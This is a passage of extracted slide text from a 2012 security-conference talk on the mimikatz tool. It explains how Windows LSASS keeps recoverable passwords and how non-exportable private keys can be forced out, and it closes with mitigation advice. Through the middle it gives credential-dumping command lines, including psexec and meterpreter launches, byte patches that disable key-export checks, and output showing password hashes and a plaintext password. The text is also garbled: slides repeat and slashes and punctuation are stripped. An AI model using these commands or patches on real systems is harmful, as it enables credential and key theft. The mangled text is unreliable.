endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39 39
Constraint for most user Unavailable for computer keys
certutil -importpfx mycertp12 NoExport certutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capi how it works
mimikatz crypto capi how it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquo ndash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellip ndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40 40
mimikatz crypto capi how itrsquos exported ( level)
mimikatz crypto capi how itrsquos exported ( level)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz cryptoexportCertificates Emplacement CERT_SYSTEM_STORE_CURRENT_USERMy - Benjamin Delpy Container Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03 Provider Microsoft Enhanced Cryptographic Provider v10 Type AT_KEYEXCHANGE Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO (0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================ Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0 Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BE Objet CN=Benjamin Delpy C=FR Il ne sagit pas dun certificat racine Hach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03 Fournisseur = Microsoft Enhanced Cryptographic Provider v10 La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de cryptage CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
mimikatz crypto memo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
Who Why Who Why
Benjamin DELPY `gentilkiwi` ndash French ndash 26y ndash Kiwi addict ndash Lazy programmer
Started to code mimikatz to ndash explain security concepts ndash improve my knowledge ndash prove to Microsoft that sometimes they must change old habits
Why all in French ndash because Irsquom ndash It limits script kiddies usage ndash Hack with class
Benjamin DELPY `gentilkiwi` ndash French ndash 26y ndash Kiwi addict ndash Lazy programmer
Started to code mimikatz to ndash explain security concepts ndash improve my knowledge ndash prove to Microsoft that sometimes they must change old habits
Why all in French ndash because Irsquom ndash It limits script kiddies usage ndash Hack with class
